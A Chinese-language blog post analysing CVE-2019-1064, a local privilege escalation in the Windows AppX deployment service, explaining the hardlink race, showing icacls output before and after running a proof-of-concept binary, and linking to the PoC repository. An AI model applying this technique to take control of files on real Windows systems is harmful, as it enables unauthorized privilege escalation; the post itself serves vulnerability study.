CVE-2019-1064 AppXSVC本地权限提升漏洞分析及poc

  • 内容
  • 相关

介绍

当Windows AppX部署服务(AppXSVC)不正确地处理硬链接时,存在一个特权提升漏洞。成功利用此漏洞的攻击者可以在高级上下文中运行进程。然后攻击者可以安装程序; 查看,更改或删除数据。

要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行可以利用此漏洞并控制受影响系统的特制应用程序。

详情

 

当用户的AppData\Local\Packages下的任何文件夹结构被删除时,文件夹结构将由位于其下的二进制文件重新创建

C:\WINDOWS\SystemApps\


例如,如果我们删除

C:\users\rythmstick\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy


将通过调用重新创建文件夹结构来重新创建

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchIU.exe -ServerName:CortanaUI.AppXa....epj.mca


文件夹结构,LocalState文件夹内容上的DACL将更新NT AUTHORITY\SYSTEM
如果我们可以在创建时间和DACL更新时间之间将硬链接放入此文件夹,我们就有机会覆盖任何NT AUTHORITY\SYSTEM完全控制的文件的DACL 。

C:\Users\0dayhack>icacls c:\windows\system.ini
c:\windows\system.ini NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(F)
                      BUILTIN\Users:(I)(RX)
                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Users\0dayhack>AppXSVC_poc.exe c:\windows\system.ini
[+] Removing C:\Users\0dayhack\AppData\Local\packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState
[+] Waiting to Create Hardlink
[+] Created Hardlink to c:\windows\system.ini
[+] You have Full Control

C:\Users\0dayhack>icacls c:\windows\system.ini
c:\windows\system.ini S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742:(I)(F)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(F)
                    * DESKTOP\0dayhack:(I)(F)
                      Mandatory Label\Low Mandatory Level:(I)(NW)

Successfully processed 1 files; Failed processing 0 files

C:\Users\0dayhack>

看看Process Monitor中发生了什么1.png

 

PoC删除了LocalState文件夹。

然后进入循环,等待AppXSVC重新创建LocalState文件夹。

AppXSVC重新创建运行为的LocalState文件夹 NT AUTHORITY\SYSTEM.

我们的PoC找到LocalState文件夹,并立即创建硬链接rs.txt C:\WINDOWS\SYSTEM.INI。下面图看到SetLinkInformationFile操作。

2.png

 

AppXSVC枚举LocalState文件夹的内容
3.png

AppXSVC修改我们的硬链接(to C:\WINDOWS\SYSTEM.INI)上的DACL,为我们的用户提供完全控制。

5.png

附带漏洞poc地址:https://github.com/RythmStick/CVE-2019-1064

 本文来源:RythmStick

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:CVE-2019-1064 AppXSVC本地权限提升漏洞分析及poc - https://www.0dayhack.com/post-881.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注